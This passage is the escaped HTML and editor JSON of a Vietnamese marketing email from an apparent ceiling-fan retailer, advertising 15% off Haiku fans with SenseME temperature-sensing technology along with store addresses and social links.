style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677923146192-Brochure_Haiku_New.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a77d6d; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'Playfair Display\', serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>Sale Off 15%<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 20px; font-weight: 400; color: #34495e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: inherit; line-height: 49px; font-size: 18px;\\\"><strong>GI\\u00c1M S\\u00c1T C\\u00d4NG NGH\\u1ec6 TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"48%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #34495e;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 gi\\u00e1m s\\u00e1t c\\u0103n ph\\u00f2ng \\u00a0\\u0111\\u1ea3m\\u00a0<br \\/>b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 \\u0111\\u1ed9 \\u1ea9m, t\\u1ef1 \\u0111\\u1ed9ng \\u0111i\\u1ec1u ch\\u1ec9nh \\u00a0t\\u1ed1c \\u0111\\u1ed9\\u00a0<br \\/>Haiku khi \\u0111i\\u1ec1u ki\\u1ec7n thay \\u0111\\u1ed5i. N\\u1ebfu th\\u1eddi ti\\u1ebft n\\u00f3ng l\\u00ean\\u00a0<br \\/>SenseME ph\\u00e1t hi\\u1ec7n v\\u00e0 t\\u0103ng t\\u1ed1c \\u0111\\u1ed9 Haiku. M\\u1edf c\\u1eeda\\u00a0<br \\/>s\\u1ed5 v\\u00e0o ban \\u0111\\u00eam v\\u00e0 SenseME s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng gi\\u1ea3m t\\u1ed1c\\u00a0<br \\/>\\u0111\\u1ed9 qu\\u1ea1t khi nhi\\u1ec7t \\u0111\\u1ed9 gi\\u1ea3m.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 40px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:37px; v-text-anchor:middle; width:152px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a5726e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"line-height: 19.6px; font-size: 14px;\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"28%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #ca979a;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:183px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"183\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:183px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/soundcloud.com\\/\\\" title=\\\"SoundCloud\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/soundcloud.png\\\" alt=\\\"SoundCloud\\\" title=\\\"SoundCloud\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 150%;\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #a47e6b;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #a47e6b;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Too many emails?\\u00a0<a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"> <span style=\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\">Unsubscribe<\\/span><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":8,\\\"u_column\\\":9,\\\"u_content_text\\\":11,\\\"u_content_image\\\":4,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4,\\\"u_content_html\\\":1},\\\"body\\\":{\\\"id\\\":\\\"0u7zmWfe6N\\\",\\\"rows\\\":[{\\\"id\\\":\\\"mzyaBaFj3Q\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"U5J6RuT_G3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PU1AcFTaVA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 5px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\",\\\"width\\\":980,\\\"height\\\":130},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IujIkibZVI\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 